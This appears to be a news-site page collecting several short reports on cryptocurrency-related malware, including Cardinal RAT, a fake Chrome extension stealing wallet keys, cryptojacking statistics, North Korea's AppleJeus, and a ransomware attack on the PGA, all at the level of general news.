Posted on

Report: Malware Targets Israeli Fintech Firms Working in Crypto, Forex Trading

According to a cybersecurity company, Israeli fintech companies are being targeted by malware.

Israeli fintech companies that work with forex and crypto trading are being targeted by malware, according to a blog post from threat research department Unit 42 of cybersecurity company Palo Alto Networks published on March 19.

Per the report, Unit 42 first encountered an older version of the malware in question, Cardinal RAT, in 2017. Since April 2017, Cardinal RAT has been identified when examining attacks against two Israel-based fintech companies engaged in developing forex and crypto trading software. The software is a Remote Access Trojan (RAT), which allows the attacker to remotely take control of the system.

The updates applied to the malware aim to evade detection and hinder its analysis. After explaining the obfuscation techniques employed by the malware, the researchers explain that the payload itself does not vary significantly compared to the original in terms of modus operandi or capabilities.

The software collects victim data, updates its settings, acts as a reverse proxy, executes commands, and uninstalls itself. It then recovers passwords, downloads and executes files, logs keypresses, captures screenshots, updates itself and cleans cookies from browsers. Unit 42 notes that it witnessed attacks employing this malware targeting fintech firms that engaged in forex and crypto trading, primarily based in Israel.

The report further claims that the threat research team discovered a possible correlation between Cardinal RAT and a JavaScript-based malware dubbed EVILNUM, which is used in attacks against similar organizations. When looking at files submitted by the same customer in a similar timeframe to the Cardinal RAT samples, Unit 42 reportedly also identified EVILNUM instances.

The post further notes that also this malware seems to only be used in attacks against fintech organizations. When researching the data, the company claims to have found another case where an organization submitted both EVILNUM and Cardinal RAT on the same day, which is particularly noteworthy since both those malware families are rare.

EVILNUM is reportedly capable of setting up to become persistent on the system, running arbitrary commands, downloading additional files and taking screenshots.

As Cointelegraph recently reported, a Google Chrome browser extension tricking users into participating in a fake airdrop from cryptocurrency exchange Huobi claimed over 200 victims.

Also, a report noted last week that cybercriminals are reportedly favoring unhurried approaches in attacks made for financial gains, with cryptojacking as a prime example of this shift.

Posted on

Google Deletes Crypto Malware Targeting Blockchain.com, MyEtherWallet Users

The malicious Google Chrome web extension was tied to a fake token airdrop from cryptocurrency exchange Huobi.

A Google Chrome browser extension tricking users into participating in a fake airdrop from cryptocurrency exchange Huobi claimed over 200 victims, a security researcher reported in a blog post on March 14.

The extension for Chrome web browser, with the name NoCoin, gained 230 downloads before Google deleted it, according to Harry Denley, who runs cryptocurrency scam database EtherscamDB.

Denley noted that hackers had purposely disguised the malicious extension to look like a tool protecting users from cryptocurrency malware or so-called cryptojacking.

“From the start, it looked like it did what it should — it was detected [sic] various CryptoJacking scripts […] and there was a nice UI to let me know it was doing its job,” he explained in the blog post.

Behind the facade, however, it became apparent the extension requests the input of private keys from popular wallet interfaces MyEtherWallet (MEW) and Blockchain.com. Private keys are then sent to hackers, who can empty wallets of holdings.

The extension lay at the end of a fake giveaway campaign, ostensibly from crypto exchange Huobi, which offered worthless ERC20 Ethereum network-based tokens to unwitting consumers.

It is unknown how long the extension remained available for Google Chrome users.

As Cointelegraph continues to report, bad actors targeting cryptocurrency users have sought increasingly nefarious methods of tricking novices into handing over access to funds. Just this week, a report identified cryptojacking as a sign of increasingly discreet behavior among hackers.

Google itself has come under fire for its own apparent lack of diligence in the past, in February pulling a fake version of popular decentralized app MetaMask from its Play store.

As Cointelegraph reported last month, users of cryptocurrency wallets Electrum and MEW were also facing phishing attacks, according to posts published on Reddit and Twitter.

Posted on

Report Shows Cryptojacking Is Prime Example of Shift Towards Discreet Cyberattacks

A recent report shows that cryptojacking is a prime example of cybercriminals’ shift to “low and slow” attack approaches.

Cybercriminals are reportedly favoring unhurried approaches in attacks made for financial gains, with cryptojacking as a prime example of this shift. IT news website ComputerWorld reported on this development on March 14.

Data released by cybersecurity company Darktrace reveals that cryptojacking attempts increased by 78 percent in 2018, and, according to ComputerWorld, the company also said that this trend continued in 2019.

The ComputerWorld article cites Max Heinemeyer, director of threat hunting at Darktrace, commenting on the findings. He reportedly said that since many ransomware victims may be unable to pay a ransom in Bitcoin (BTC) due to technical ineptitude, cryptojacking might be a better approach.

He added that “it [cryptojacking] is low and slow and guarantees a profit,” while ransomware does not. ComputerWorld also quotes Heinemeyer as stating that the barriers to entry to creating cryptojacking malware are low.

Heinemeyer also said that other methods, such as stealing credit card credentials, are cumbersome since criminals need to establish money laundering networks in order to avoid law enforcement. Lastly, he also noted:

“We’ve seen so many different variants of how these pieces of malware are spreading or being loaded.”

Per the report, he cited a company based out of the United Kingdom that saw over 400 devices very quickly infected by a cryptojacking malware after an initial infection via a phishing email. Also, according to Heinemeyer, one system admin installed a mining device underneath the floorboards of the data center where he worked at a major European bank in a creative cryptojacking move.

The article also suggests that such attacks mine the Monero (XMR) blockchain, since unlike Bitcoin, it is more suitable for mining on non-specialized, even consumer-grade, hardware. However, Cointelegraph recently wrote that a Monero upgrade has made the coin more resistant to ASIC mining.

As Cointelegraph has reported, of about 400 servers running virtualization software Docker that were found to be vulnerable to outside exploitation, most were seemingly running Monero mining software.

Also, United States-based software corporation Microsoft has removed eight Windows 10 applications from its official app store after cybersecurity firm Symantec identified the presence of surreptitious Monero coin mining code in February.

Posted on

Cryptojacking Overtakes Ransomware as Top Malware in Some Countries

Malware that uses infected hardware for mining crypto without authorization has become the top cyber threat in certain countries.

Cryptojacking, the unauthorized use of another’s hardware to mine cryptocurrency, has become the biggest cyber threat in many parts of the world, Bloomberg reported Dec. 14.

According to research from cyber security research firm Kaspersky Lab, cryptojacking overtook ransomware as the biggest cybersecurity threat particularly in the Middle East, Turkey, and Africa. In Afghanistan and Ethiopia over one out of four detected malware are cryptocurrency miners, according to Kaspersky’s data.

As cited by the Bloomberg, Kaspersky’s research “shows crypto mining attacks have risen almost fourfold in the region, from 3.5 million in 2017 to 13 million this year.” The cybersecurity firm reportedly also claimed that cryptojacking incidents are “likely to continue given the increased use of digital currencies.”

A report released by Kaspersky in November declares that the reason for the rise of cryptojacking malware compared to ransomware may “be due to the fact that people from developing markets are not so eager to pay a ransom.”

Not only PC but also smartphone users are targeted by unauthorized mining software — from the 2016-2017 period to the 2017-2018 period, these kinds of attacks reportedly increased by 9.5 percent.

Fabio Assolini, Kaspersky’s Senior Security Researcher, told Bloomberg that “the [Middle East, Turkey, Africa] region is becoming more appealing to cyber-criminals, with financial and malicious cryptomining attacks taking center stage.” Assolini also claimed that such attacks are becoming increasingly popular because they are “less noticeable” than ransomware.

Still, the increase in the popularity of this kind of malware has not been global. For instance, this year it registered a decrease of 15 percent in Zambia and 11 percent in Uzbekistan, according the cybersecurity firm. The report concludes

“Last year we asked what tips the scales for cybercriminals? Today, this is no longer a question. Miners will keep spreading across the globe, attracting more people.”

Cryptojacking is not the only way in which cybercriminals use cryptocurrency. As Cointelegraph reported in October, users of the popular video game Fortnite have been targeted by a malware that steals Bitcoin (BTC) wallet addresses.

Not only individuals resort to such actions in search of financial gains. According to a Chinese cybersecurity company, after targeting cryptocurrency exchanges, North Korean hackers have started to steal cryptocurrencies from individuals.

Posted on

Report: Number of Routers Affected by Crypto Malware Doubled Since August, Reaching 415K

A security researcher claims that the number of MikroTik routers affected by cryptojacking malware has doubled since August 2018.

The number of MikroTik routers affected by cryptojacking malware has repotedly doubled since summer 2018, reaching 415,000, security researcher VriesHd tweeted Sunday, Dec. 2.

Since August, VriesHd has been reporting on crypto malware that targets routers and forces them to mine cryptocurrencies along with the researchers from Bad Packets Report.

They revealed that routers by Mikrotik, a Latvian manufacturer of network equipment, were compromised by at least 16 different types of malware including Coinhive, a cryptojacking software mining privacy-oriented cryptocurrency Monero (XMR).

By September the estimated number of compromised routers surpassed 280,000, according to Bad Packets. In the recent tweet VriesHd explains that he has only checked three possible ways to abuse MikroTik, although there may be several more. VriesHd’s review, which is only based on preliminary projections, shows 415,000 routers affected.

As VriesHd told tech news outlet The Next Web, the attackers have recently switched from Coinhive to other mining software, such as Omine and CoinImp. He also noted that the exact number might be slightly off, as the data only reflects IP addresses infected. However, he believes the number is still high. “It wouldn’t surprise me if the actual number […] would be somewhere around 350,000 to 400,000,” VriesHd said.

As Cointelegraph previously reported, Brazil is the most affected by cryptojacking. According to research by Iran’s cybersecurity authority, Brazil was hit over 81,000 times by Coinhive in October alone. India came in second with around 29,000 incidents, followed by Indonesia with more than 23,000. Iran itself experienced around 11,000.

According to a Bloomberg report, the total number of crypto mining malware infections increased 500 percent this year after hackers allegedly stolen a code targeting Microsoft Systems from the U.S. National Security Agency (NSA).

Another report by network and enterprise security company Palo Alto Networks found that around 5 percent of all Monero in circulation was mined through cryptojacking.

Posted on

Firefox to Block Cryptojacking Malware in New Browser Releases

Firefox will block cryptojacking malware in future versions of its web browser, according to an announcement August 30.

The move comes as part of an anti-tracking initiative expected to be implemented over the next few months. In the announcement, Firefox cites a study by browser extension Ghostery, stating that 55.4 percent of the total time required to load an average website is spent loading third party trackers.

Future versions of Firefox will reportedly block such practices as cryptomining scripts that “silently mine cryptocurrencies” on users’ devices by default. By blocking tracking and offering a “clear set of controls,” Firefox is looking to provide its users more choice over what data they share with websites.

Back in 2016, Mozilla, the company behind Firefox browser, implemented practices encouraging users to take care of their online privacy and security in an ongoing shift towards data encryption. Firefox reportedly was going to block connections to HTTPS secure servers employing weak encryption and establish a minimum of 1023 bits for TLS handshakes using Diffie-Hellman keys.

Another major web browser, Opera, included anti-crypto mining in their integrated ad-blocker for desktop in December last year. Later in January, the company announced plans to add the feature to their mobile browser as well.

This month, Opera announced the launch of its desktop web browser with built-in crypto wallet functionality. As with the mobile app, the desktop client will support tokens as well as digital collectibles, with product lead of Opera Crypto Charles Hamel commenting that browser integration represents a further step in “making cryptocurrencies and Web 3.0. mainstream.”

Posted on

North Korean Hackers Unleash Mac Malware On Crypto Exchanges

It seems that the only thing on the rise in the crypto industry at the moment is malware, not prices. Cyber security researchers have recently revealed more crypto-centric malware emerging from North Korea.

According to a detailed summary by Russian computer security firm Kaspersky, North Korean hacker group Lazarus has been highly active in recent months. The cyber criminals have “successfully compromised several banks and infiltrated a number of global cryptocurrency exchanges and fintech companies,” according to the report.

The malware, named ‘AppleJeus’, was inadvertently downloaded by an employee of an unnamed crypto exchange. The security researchers claim to have made the unexpected discovery while investigating the attack by the group on the exchange. It revealed the victim had been attacked by a trojan crypto trading application recommended to the company via email.

After downloading the malicious software the victim’s computer was infected by Fallchill malware which Lazarus had previously used. Kaspersky went on to state that it was the first time the group had deployed malware for other operating systems;

“To ensure that the OS platform was not an obstacle to infecting targets, it seems the attackers went the extra mile and developed malware for other platforms, including for macOS. A version for Linux is apparently coming soon, according to the website. It’s probably the first time we see this APT group using malware for macOS.”

The payload came via a convincing but fake website as the group strives to reach new levels of sophistication. The actual Trojan arrived as an update to the trading app which is a further attempt to mask its presence. The Celas Trade Pro software from Celas Limited showed no signs of malicious behavior and looked genuine according to the research.

In addition to the Mac version was a Windows version of the spurious trading program in a downloadable file called celastradepro_win_installer_1.00.00.msi. Once installed the Updater.exe module will deliver the payload which is designed to steal cryptocurrency.

Kaspersky continued with a lengthy breakdown of how the malware operates and what they have discovered about the bogus company. In reference to Lazarus it added “Recent investigation shows how aggressive the group is and how its strategies may evolve in the future.” South Korean exchanges have been the target of Lazarus before with a number of reports of attacks earlier this year.

Crypto markets may be in decline but attempts to steal digital assets by hacker groups are definitely taking the opposite trend.

loading…

Posted on

Kaspersky Lab: North Korea Hacks Cryptocurrency Exchange With ‘First’ macOS Malware

North Korean hackers have infected a cryptocurrency exchange with malware for both Windows and macOS for reportedly the first time, Russian internet security company Kaspersky Lab announced Thursday, August 23.

In Kaspersky’s report, the company reveals the malware — dubbed “AppleJeus” — made its way into the systems of an unnamed exchange after an employee downloaded a “tainted” app. Kaspersky now believes the app came from a fake developer with fake security certificates in a major operation by North Korean hacker collective Lazarus Group.

The malware aimed to steal cryptocurrency funds, Kaspersky claims, in what marks the latest in a spate of both successful and failed attempts by North Korea in the crypto hacking space.

Kaspersky’s report states that in order to “ensure that the OS platform was not an obstacle to infecting targets, it seems the attackers went the extra mile and developed malware for other platforms, including for macOS,” noting:

“A version for Linux is apparently coming soon, according to the website. It’s probably the first time we see this APT group using malware for macOS.”

South Korean exchanges have traditionally been the targets for Lazarus, with a rash of complaints surfacing with regard to attacks on platforms such as Bithumb, YouBit, and Coinlink.

Speaking to Bleeping Computer, Vitaly Kamluk, head of Kaspersky’s GReAT APAC team, added:

“The fact that they developed malware to infect macOS users in addition to Windows users and – most likely – even created an entirely fake software company and software product in order to be able to deliver this malware undetected by security solutions, means that they see potentially big profits in the whole operation.”

In early July, a group of security researchers had discovered macOS malware attacks targeting Slack and Discord users talking about cryptocurrencies, with hackers  impersonating “key people” in crypto-related chats and then sharing “small snippets” that are downloaded and execute a malicious binary.

Posted on

Citrix Survey: More Than Half of UK Companies Hit by Cryptojacking Malware at Some Point

As much as 59 percent of U.K. companies have been affected by cryptojacking malware at some point. Roughly half of those cases took place in the previous month, news outlet Internet of Business reports August 15, citing a research commissioned by Citrix.

According to Internet of Business, the research, commissioned by software company Citrix and performed by OnePoll, asked 750 IT executives from U.K. companies that number more than 250 employees about their experience with cryptojacking attacks.

Cryptojacking malware employs its victim’s computational resources without their permission in order to mine cryptocurrencies for the attacker. This leads to a wasteful increase in electric power consumption and the slowing down of affected devices.

Citrix’s research claims that 59 percent of the respondents said that they have been hit with cryptojacking malware at some point. At least 80 percent of those cases took place in the past six months.

Thirty percent of all companies surveyed have said that they were affected within the previous month alone.

Cryptojacking

Scale-wise, 60 percent of the respondents have said that up to 50 devices in their company had been hit, while in 11 percent of cases the number went up to 100.

After an attack is discovered, as many as 67 percent of companies have formal policies in place to deal with it — a surprisingly high number for such a recently emerged threat as cryptojacking, Internet of Business notes.

The threat of cryptojacking is very real for companies and individuals worldwide, with the amount of attacks increasing by a whopping 629 percent in the first quarter of 2018, according to an earlier report by security firm McAfee Labs.

Although the interest in this vector of attack has reportedly plateaued in the second quarter of the year — mainly due to the decrease in cryptocurrency prices — the malware is still ubiquitous, in one case even being delivered to victims via a videogame on the Steam marketplace.

Posted on

The PGA Falls Victim To Bitcoin Ransomware Attack

While cryptocurrency prices have taken a tumble, with valuations falling by upwards of 70%, ransomware still seems to be a medium of attack for cryptocurrency-focused hackers. As per an article from Golfweek, the Professional Golfers Association, a group of the best golfers from around the globe, has fallen under a cyberattack.

The report from the golf news source pointed out how “shadowy bandits” locked PGA officials out of essential files, with this attack coming prior to two upcoming PGA Championships in the U.S. and France.

The news of this ransomware attack first originated on Tuesday morning, when PGA staff members were unable to access their files to work on. When opening a file, the staff would be prompted with the following message, which clearly led some to believe that something was afoot:

 “Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm… We exclusively have decryption software for your situation. No decryption software is available in the public.”

As is the common theme with ransomware attacks, hackers also noted that any attempt to break the algorithm could result in the files being deleted permanently, writing:

“This may lead to the impossibility of recovery of certain files.”

Upon further investigation, the files that were under lock and key was revealed to be creative materials for the upcoming championships. More specifically, the promotional logos and banners that would be used for digital and physical publications for advertisements. It was also noted that the locked media includes development work on future PGA logos, which are near-irreplaceable and are the brainchildren of PGA staff.

The message also included a Bitcoin wallet address, but the hackers did not specify an amount that the PGA staff should pay to gain control over their files. While the work locked up is of importance, a person familiar with the matter expects the PGA to push aside this issue, and will not be willing to pay any sort of ransom.

The promotional materials may be important to the PGA, but maybe not important enough to warrant a hefty sum, as the U.S.-based association has yet to discover cases of ransomware that will substantially impact the success of the upcoming tournament circuit.

Cryptojacking And Ransomware, Two Primary Methods of Crypto CyberAttack

Cryptojacking and ransomware have become growing issues as cryptocurrencies have exploded in value. While ransomware, the method of attack aforementioned, still remains a hot topic within the hacker community, cryptojacking has quickly surpassed ransomware to become the biggest cyber problem.

For those who are unaware, cryptojacking is a specific type of cybercrime that sees malicious hackers take control of a victim’s piece of technology, forcing the device to mine cryptocurrencies for the hacker’s personal gain. Cryptojacking malware, although generating only a few cents per device affected, can easily sweep across thousands, if not millions of computers, netting the hackers a nice reward.

Many hackers have begun to allocate their resources to cryptojacking instead of ransomware, as it is often unintrusive and goes under the radar of many consumers. As cybersecurity expert Troy Mursch put it:

Ransomware is basically like pointing a gun at you and saying, ‘Hey, pay up or you’re not getting your files back,’ versus cryptojacking you might not even know about it, it’s just going to silently steal your electricity.

Photo by Fancycrave on Unsplash

loading…